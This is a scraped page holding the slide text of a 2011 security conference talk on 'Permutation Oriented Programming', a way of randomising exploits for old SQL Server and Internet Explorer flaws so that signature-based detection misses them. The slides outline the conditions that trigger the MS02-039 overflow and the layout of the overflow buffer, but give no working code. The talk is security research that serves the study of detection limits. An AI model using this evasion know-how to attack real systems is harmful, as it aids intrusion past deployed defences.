"ENG++: Permutation Oriented Programming" por Nelson Brito"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson BritoSegInfo
 
[PH-Neutral 0x7db] Exploit Next Generation®
[PH-Neutral 0x7db] Exploit Next Generation®[PH-Neutral 0x7db] Exploit Next Generation®
[PH-Neutral 0x7db] Exploit Next Generation®Nelson Brito
 
DEF CON 23 - Wesley McGrew - i hunt penetration testers
DEF CON 23 - Wesley McGrew - i hunt penetration testersDEF CON 23 - Wesley McGrew - i hunt penetration testers
DEF CON 23 - Wesley McGrew - i hunt penetration testersFelipe Prado
 
Defending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricalityDefending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricalityClaus Cramon Houmann
 
Keynote Information Security days Luxembourg 2015
Keynote Information Security days Luxembourg 2015Keynote Information Security days Luxembourg 2015
Keynote Information Security days Luxembourg 2015Claus Cramon Houmann
 
Presentation infra and_datacentrre_dialogue_v2
Presentation infra and_datacentrre_dialogue_v2Presentation infra and_datacentrre_dialogue_v2
Presentation infra and_datacentrre_dialogue_v2Claus Cramon Houmann
 
Vulnerability Management In An Application Security World
Vulnerability Management In An Application Security WorldVulnerability Management In An Application Security World
Vulnerability Management In An Application Security WorldDenim Group
 
Eirtight writing secure code
Eirtight writing secure codeEirtight writing secure code
Eirtight writing secure codeKieran Dundon
 
Exploit Next Generation®: Missão dada é missão cumprida!
Exploit Next Generation®: Missão dada é missão cumprida!Exploit Next Generation®: Missão dada é missão cumprida!
Exploit Next Generation®: Missão dada é missão cumprida!Nelson Brito
 
Offence oriented Defence
Offence oriented DefenceOffence oriented Defence
Offence oriented DefenceSensePost
 
How to adapt the SDLC to the era of DevSecOps
How to adapt the SDLC to the era of DevSecOpsHow to adapt the SDLC to the era of DevSecOps
How to adapt the SDLC to the era of DevSecOpsZane Lackey
 
Mitigating worm attacks
Mitigating worm attacksMitigating worm attacks
Mitigating worm attacksdkaya
 
Keynote at the Cyber Security Summit Prague 2015
Keynote at the Cyber Security Summit Prague 2015Keynote at the Cyber Security Summit Prague 2015
Keynote at the Cyber Security Summit Prague 2015Claus Cramon Houmann
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...EC-Council
 
2020 11-15 marcin ludwiszewski - purple, red, blue and others - rainbow team...
2020 11-15 marcin ludwiszewski - purple, red, blue and others - rainbow team...2020 11-15 marcin ludwiszewski - purple, red, blue and others - rainbow team...
2020 11-15 marcin ludwiszewski - purple, red, blue and others - rainbow team...Marcin Ludwiszewski
 
Design and Analyze Secure Networked Systems - 2
Design and Analyze Secure Networked Systems - 2Design and Analyze Secure Networked Systems - 2
Design and Analyze Secure Networked Systems - 2Don Kim
 
Application security in a hurry webinar
Application security in a hurry webinarApplication security in a hurry webinar
Application security in a hurry webinarkdinerman
 
How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)Scott Sutherland
 

Similar to Vale Security Conference - 2011 - 13 - Nelson Brito (20)

"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson Brito"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson Brito
 
[PH-Neutral 0x7db] Exploit Next Generation®
[PH-Neutral 0x7db] Exploit Next Generation®[PH-Neutral 0x7db] Exploit Next Generation®
[PH-Neutral 0x7db] Exploit Next Generation®
 
DEF CON 23 - Wesley McGrew - i hunt penetration testers
DEF CON 23 - Wesley McGrew - i hunt penetration testersDEF CON 23 - Wesley McGrew - i hunt penetration testers
DEF CON 23 - Wesley McGrew - i hunt penetration testers
 
Defending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricalityDefending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricality
 
Keynote Information Security days Luxembourg 2015
Keynote Information Security days Luxembourg 2015Keynote Information Security days Luxembourg 2015
Keynote Information Security days Luxembourg 2015
 
Presentation infra and_datacentrre_dialogue_v2
Presentation infra and_datacentrre_dialogue_v2Presentation infra and_datacentrre_dialogue_v2
Presentation infra and_datacentrre_dialogue_v2
 
Truth and Consequences
Truth and ConsequencesTruth and Consequences
Truth and Consequences
 
Vulnerability Management In An Application Security World
Vulnerability Management In An Application Security WorldVulnerability Management In An Application Security World
Vulnerability Management In An Application Security World
 
Eirtight writing secure code
Eirtight writing secure codeEirtight writing secure code
Eirtight writing secure code
 
Exploit Next Generation®: Missão dada é missão cumprida!
Exploit Next Generation®: Missão dada é missão cumprida!Exploit Next Generation®: Missão dada é missão cumprida!
Exploit Next Generation®: Missão dada é missão cumprida!
 
Offence oriented Defence
Offence oriented DefenceOffence oriented Defence
Offence oriented Defence
 
How to adapt the SDLC to the era of DevSecOps
How to adapt the SDLC to the era of DevSecOpsHow to adapt the SDLC to the era of DevSecOps
How to adapt the SDLC to the era of DevSecOps
 
Mitigating worm attacks
Mitigating worm attacksMitigating worm attacks
Mitigating worm attacks
 
Keynote at the Cyber Security Summit Prague 2015
Keynote at the Cyber Security Summit Prague 2015Keynote at the Cyber Security Summit Prague 2015
Keynote at the Cyber Security Summit Prague 2015
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
 
Metasploit
MetasploitMetasploit
Metasploit
 
2020 11-15 marcin ludwiszewski - purple, red, blue and others - rainbow team...
2020 11-15 marcin ludwiszewski - purple, red, blue and others - rainbow team...2020 11-15 marcin ludwiszewski - purple, red, blue and others - rainbow team...
2020 11-15 marcin ludwiszewski - purple, red, blue and others - rainbow team...
 
Design and Analyze Secure Networked Systems - 2
Design and Analyze Secure Networked Systems - 2Design and Analyze Secure Networked Systems - 2
Design and Analyze Secure Networked Systems - 2
 
Application security in a hurry webinar
Application security in a hurry webinarApplication security in a hurry webinar
Application security in a hurry webinar
 
How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)
 

More from Vale Security Conference

Vale Security Conference - 2011 - 17 - Rodrigo Rubira Branco (BSDaemon)
Vale Security Conference - 2011 - 17 - Rodrigo Rubira Branco (BSDaemon)Vale Security Conference - 2011 - 17 - Rodrigo Rubira Branco (BSDaemon)
Vale Security Conference - 2011 - 17 - Rodrigo Rubira Branco (BSDaemon)Vale Security Conference
 
Vale Security Conference - 2011 - 11 - Fernando Mercês [Octane Labs] [Coding ...
Vale Security Conference - 2011 - 11 - Fernando Mercês [Octane Labs] [Coding ...Vale Security Conference - 2011 - 11 - Fernando Mercês [Octane Labs] [Coding ...
Vale Security Conference - 2011 - 11 - Fernando Mercês [Octane Labs] [Coding ...Vale Security Conference
 
Vale Security Conference - 2011 - 5 - Luiz Eduardo
Vale Security Conference - 2011 - 5 - Luiz EduardoVale Security Conference - 2011 - 5 - Luiz Eduardo
Vale Security Conference - 2011 - 5 - Luiz EduardoVale Security Conference
 
Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]
Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]
Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]Vale Security Conference
 
Vale Security Conference - 2011 - 2 - Dr. Emerson Wendt
Vale Security Conference - 2011 - 2 - Dr. Emerson WendtVale Security Conference - 2011 - 2 - Dr. Emerson Wendt
Vale Security Conference - 2011 - 2 - Dr. Emerson WendtVale Security Conference
 
Vale Security Conference - 2011 - 12 - Rafael Soares Ferreira
Vale Security Conference - 2011 - 12 - Rafael Soares FerreiraVale Security Conference - 2011 - 12 - Rafael Soares Ferreira
Vale Security Conference - 2011 - 12 - Rafael Soares FerreiraVale Security Conference
 
Vale Security Conference - 2011 - 6 - Thiago Bordini
Vale Security Conference - 2011 - 6 - Thiago BordiniVale Security Conference - 2011 - 6 - Thiago Bordini
Vale Security Conference - 2011 - 6 - Thiago BordiniVale Security Conference
 
Vale Security Conference - 2011 - 15 - Anchises de Paula
Vale Security Conference - 2011 - 15 - Anchises de PaulaVale Security Conference - 2011 - 15 - Anchises de Paula
Vale Security Conference - 2011 - 15 - Anchises de PaulaVale Security Conference
 
Vale Security Conference - 2011 - 14 - Alexandro Silva (Alexos) [DC Labs]
Vale Security Conference - 2011 - 14 - Alexandro Silva (Alexos) [DC Labs]Vale Security Conference - 2011 - 14 - Alexandro Silva (Alexos) [DC Labs]
Vale Security Conference - 2011 - 14 - Alexandro Silva (Alexos) [DC Labs]Vale Security Conference
 

More from Vale Security Conference (9)

Vale Security Conference - 2011 - 17 - Rodrigo Rubira Branco (BSDaemon)
Vale Security Conference - 2011 - 17 - Rodrigo Rubira Branco (BSDaemon)Vale Security Conference - 2011 - 17 - Rodrigo Rubira Branco (BSDaemon)
Vale Security Conference - 2011 - 17 - Rodrigo Rubira Branco (BSDaemon)
 
Vale Security Conference - 2011 - 11 - Fernando Mercês [Octane Labs] [Coding ...
Vale Security Conference - 2011 - 11 - Fernando Mercês [Octane Labs] [Coding ...Vale Security Conference - 2011 - 11 - Fernando Mercês [Octane Labs] [Coding ...
Vale Security Conference - 2011 - 11 - Fernando Mercês [Octane Labs] [Coding ...
 
Vale Security Conference - 2011 - 5 - Luiz Eduardo
Vale Security Conference - 2011 - 5 - Luiz EduardoVale Security Conference - 2011 - 5 - Luiz Eduardo
Vale Security Conference - 2011 - 5 - Luiz Eduardo
 
Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]
Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]
Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]
 
Vale Security Conference - 2011 - 2 - Dr. Emerson Wendt
Vale Security Conference - 2011 - 2 - Dr. Emerson WendtVale Security Conference - 2011 - 2 - Dr. Emerson Wendt
Vale Security Conference - 2011 - 2 - Dr. Emerson Wendt
 
Vale Security Conference - 2011 - 12 - Rafael Soares Ferreira
Vale Security Conference - 2011 - 12 - Rafael Soares FerreiraVale Security Conference - 2011 - 12 - Rafael Soares Ferreira
Vale Security Conference - 2011 - 12 - Rafael Soares Ferreira
 
Vale Security Conference - 2011 - 6 - Thiago Bordini
Vale Security Conference - 2011 - 6 - Thiago BordiniVale Security Conference - 2011 - 6 - Thiago Bordini
Vale Security Conference - 2011 - 6 - Thiago Bordini
 
Vale Security Conference - 2011 - 15 - Anchises de Paula
Vale Security Conference - 2011 - 15 - Anchises de PaulaVale Security Conference - 2011 - 15 - Anchises de Paula
Vale Security Conference - 2011 - 15 - Anchises de Paula
 
Vale Security Conference - 2011 - 14 - Alexandro Silva (Alexos) [DC Labs]
Vale Security Conference - 2011 - 14 - Alexandro Silva (Alexos) [DC Labs]Vale Security Conference - 2011 - 14 - Alexandro Silva (Alexos) [DC Labs]
Vale Security Conference - 2011 - 14 - Alexandro Silva (Alexos) [DC Labs]
 

Recently uploaded

Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 

Recently uploaded (20)

Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 

Vale Security Conference - 2011 - 13 - Nelson Brito

  • 1.
  • 2. Agenda • 0000 – A long time ago… • 0100 – Demonstration • 0001 – Introduction • 0101 – Conclusions • 0010 – Brain at work • 0110 – Testimonial • 0011 – Approach • 0111 – Questions and Answers
  • 3. nbrito@pitbull:~$ whoami • Nelson Brito: • Computer/Network Security Researcher Enthusiast • Spare-time Security Researcher • Addict for systems’ (in)security • sekure SDI • Home town: • Rio de Janeiro • Public tools: • T50: an Experimental Mixed Packet Injector • Permutation Oriented Programming • ENG++ SQL Fingerprint™ • WEB: • http://about.me/nbrito
  • 4.
  • 5. A long time ago, in a galaxy far, far away…
  • 6.
  • 7. Before starting 0-Day Pattern-matching • 0-day is cool, isn’t it? But only if nobody is aware of its • This technology is as need today as it was in the past, existence. but the security solution cannot rely only on this. • Once the unknown vulnerability becomes known, the • No matter how fast is the pattern-matching 0-day will expire – since a patch or a mitigation is algorithm, if a pattern does not match, it means that released (which comes first). there is no vulnerability exploitation. • So we can conclude that, once expired (patched or • No vulnerability exploitation, no protection action… mitigated), 0-day has no more value. If you do not But what if the pattern is wrong? believe me, you can try to sell a well-known vulnerability to your vulnerability-broker. • How can we guarantee that the pattern, which did not match, is the correct approach for a protection • Some security solutions fight against 0-day faster action? Was the detection really designed to detect than the affected vendor. the vulnerability?
  • 8. Some concepts Exploitation Vulnerability • There are lots of good papers and books describing • Any vulnerability has a trigger, which leads the the exploitation techniques. Thus, I do recommend vulnerability to a possible and reasonable exploitation. you to look for them for a better understanding. • For some weakness types the vulnerability allows to • This lecture has no pretension of being a complete control the flow of software’s execution, executing reference for this topic. an arbitrary code (shellcode), such as: CWE-119, CWE- 120, CWV-134, CWE-190, CWE-196, CWE-367, etc. • The exploitation path described here is something that I decided to follow, and it helped me to • Before executing a shellcode, the exploitation must understand and apply POP (f.k.a. ENG++) to the deal with the vulnerable ecosystem (trigger, return vulnerabilities. address, etc…), performing memory manipulation on additional entities (such as: offset, register, • All the definitions are in compliance with: JUMP/CALL, stack, heap, memory alignment, memory padding, etc). – Common Vulnerabilities and Exposures. – Common Vulnerability Scoring System. – Common Weakness Enumeration.
  • 9. Current evasion techniques (a.k.a. TT) Techniques Tools • Packet fragmentation • Fragroute / Fragrouter / Sniffjoke • Stream segmentation • ADMutate / ALPHA[2-3] / BETA3 / Others • Byte and traffic insertion • Whisker / Nikto / Sandcat • Polymorphic shellcode • Snot / Stick / IDS-wakeup / Others • Denial of Service • Sidestep / RPC-evade-poc.pl / Others • URL obfuscation (+ SSL encryption) • Predator (AET) • RPC fragmentation • Etc… • HTML and JavaScript obfuscation • Etc…
  • 10. What is Permutation Oriented Programming? The scenario The technique • Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching day faster than the affected vendor”. technology, there are two options: – Easier: know how the vulnerability is detected • This protection (mitigation) has a long life, and (access to signature/vaccine). sometimes the correct protection (patch) is not – Harder: know deeply how to trigger the applied. vulnerability and how to exploit it (access to vulnerable ecosystem). • Sometimes, even vendors might adopt pattern- matching to release a mitigation (workaround) while working on a correct patch. • Permutation Oriented Programming: – Deep analysis of a vulnerability, (re)searching • People’s hope, consequently their security strategy, for alternatives. resides on this security model: vulnerability mitigated, – Use all the acquired knowledge and alternatives no patch… to offer a variety of decision points (variants). – Intended to change the behavior of exploit • But what if an old and well-known vulnerability could developers. be exploited, even on this security approach model? – Use randomness to provide unpredictable payloads, i.e., permutation. • According to pattern-matching, any new variant of an old vulnerability exploitation is considered a new vulnerability, because there is no pattern to be matched yet!
  • 11. What is Permutation Oriented Programming? The scenario The technique • Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching day faster than the affected vendor”. technology, there are two options: – Easier: know how the vulnerability is detected • This protection (mitigation) has a long life, and (access to signature/vaccine). sometimes the correct protection (patch) is not – Harder: know deeply how to trigger the applied. vulnerability and how to exploit it (access to vulnerable ecosystem). • Sometimes, even vendors might adopt pattern- matching to release a mitigation (workaround) while working on a correct patch. • Permutation Oriented Programming: – Deep analysis of a vulnerability, (re)searching • People’s hope, consequently their security strategy, for alternatives. resides on this security model: vulnerability mitigated, – Use all the acquired knowledge and alternatives no patch… to offer a variety of decision points (variants). – Intended to change the behavior of exploit • But what if an old and well-known vulnerability could developers. be exploited, even on this security approach model? – Use randomness to provide unpredictable payloads, i.e., permutation. • According to pattern-matching, any new variant of an old vulnerability exploitation is considered a new vulnerability, because there is no pattern to be matched yet!
  • 12. What is Permutation Oriented Programming? The scenario The technique • Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching day faster than the affected vendor”. technology, there are two options: – Easier: know how the vulnerability is detected • This protection (mitigation) has a long life, and (access to signature/vaccine). sometimes the correct protection (patch) is not – Easier: know deeply how to trigger the applied. vulnerability and how to exploit it (access to vulnerable ecosystem). • Sometimes, even vendors might adopt pattern- matching to release a mitigation (workaround) while working on a correct patch. • Permutation Oriented Programming: – Deep analysis of a vulnerability, (re)searching • People’s hope, consequently their security strategy, for alternatives. resides on this security model: vulnerability mitigated, – Use all the acquired knowledge and alternatives no patch… to offer a variety of decision points (variants). – Intended to change the behavior of exploit • But what if an old and well-known vulnerability could developers. be exploited, even on this security approach model? – Use randomness to provide unpredictable payloads, i.e., permutation. • According to pattern-matching, any new variant of an old vulnerability exploitation is considered a new vulnerability, because there is no pattern to be matched yet!
  • 13. POP (pronounced /pŏp/) technique The truth The examples • POP technique deals with vulnerable ecosystem and • Server-side vulnerabilities: memory manipulation, rather than shellcode. – MS02-039: CVE-2002-0649/CWE-120. – MS02-056: CVE-2002-1123/CWE-120. • POP is neither a new polymorphic shellcode technique, nor an obfuscation technique: • Client-side vulnerabilities: – Shellcode is the last thing the exploitation – MS08-078: CVE-2008-4844/CWE-367. and/or detection should care about. – MS09-002: CVE-2009-0075/CWE-367. – Obfuscation is not an elegant technique to apply to an exploitation. • Windows 32-bit shellcodes: • POP technique can be applied to work with Rapid7 – 波動拳: “CMD /k”. Metasploit Framework, CORE Impact Pro, Immunity – 昇龍拳: “CMD /k set DIRCMD=/b”. CANVAS Professional, and regular stand-alone proof-of-concepts (freestyle coding). • All example modules were ported to work with Rapid7 Metasploit Framework, but there are also • POP technique maintains the exploitation reliability, examples for client-side in HTML and JavaScript. even using random decisions, it is able to achieve all exploitation requirements.
  • 14. What if… exploit #1
  • 15. What if… exploit #1 exploit #2
  • 16. What if… exploit #1 exploit #N exploit #2
  • 17. What if… exploit #1 exploit #N exploit #2 shared zone
  • 18. What if… exploit #1 exploit #N exploit #2 shared zone
  • 19. What if… exploit #1 exploit #N exploit #2 shared zone Permutation Oriented Programming
  • 20.
  • 21. Vulnerabilities MS02-039 MS08-078 • Common Vulnerabilities and Exposures: • Common Vulnerabilities and Exposures: – CVE-2002-0649. – CVE-2008-4844. • Common Weakness Enumeration: • Common Weakness Enumeration: – CWE-120. – CWE-367. • CVSS Severity: 7.5 (HIGH). • CVSS Severity: 9.3 (HIGH). • Target: • Target: – Microsoft SQL Server 2000 SP0-2. – Microsoft Internet Explorer 5.01 SP4, 6 SP0-1, 7 and 8 Beta 2. • Vulnerable ecosystem: – Protocol UDP. • Vulnerable ecosystem: – Communication Port 1434. – XML Data Island feature enabled (default). – SQL Request CLNT_UCAST_INST. – DHTML with embedded Data binding. – INSTANCENAME >= 96 bytes. – XML Data Source Object (DSO). – INSTANCENAME != NULL. – Data Consumer (HTML element) pointing to a dereferenced XML DSO.
  • 22. Vulnerabilities MS02-039 MS08-078 • Common Vulnerabilities and Exposures: • Common Vulnerabilities and Exposures: – CVE-2002-0649. – CVE-2008-4844. • Common Weakness Enumeration: • Common Weakness Enumeration: – CWE-120. – CWE-367. • CVSS Severity: 7.5 (HIGH). • CVSS Severity: 9.3 (HIGH). • Target: • Target: – Microsoft SQL Server 2000 SP0-2. – Microsoft Internet Explorer 5.01 SP4, 6 SP0-1, 7 and 8 Beta 2. • Vulnerable ecosystem: – Protocol UDP. • Vulnerable ecosystem: – Communication Port 1434. – XML Data Island feature enabled (default). – SQL Request CLNT_UCAST_INST. – DHTML with embedded Data binding. – INSTANCENAME >= 96 bytes. – XML Data Source Object (DSO). – INSTANCENAME != NULL. – Data Consumer (HTML element) pointing to a dereferenced XML DSO.
  • 23.
  • 24.
  • 25.
  • 26. CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 27. memory manipulation vulnerability CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 28. memory manipulation vulnerability memory stack CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 29. memory manipulation vulnerability 0x04 request memory stack CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 30. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename memory stack CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 31. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 32. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 33. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return address additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 34. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump address padding additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 35. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
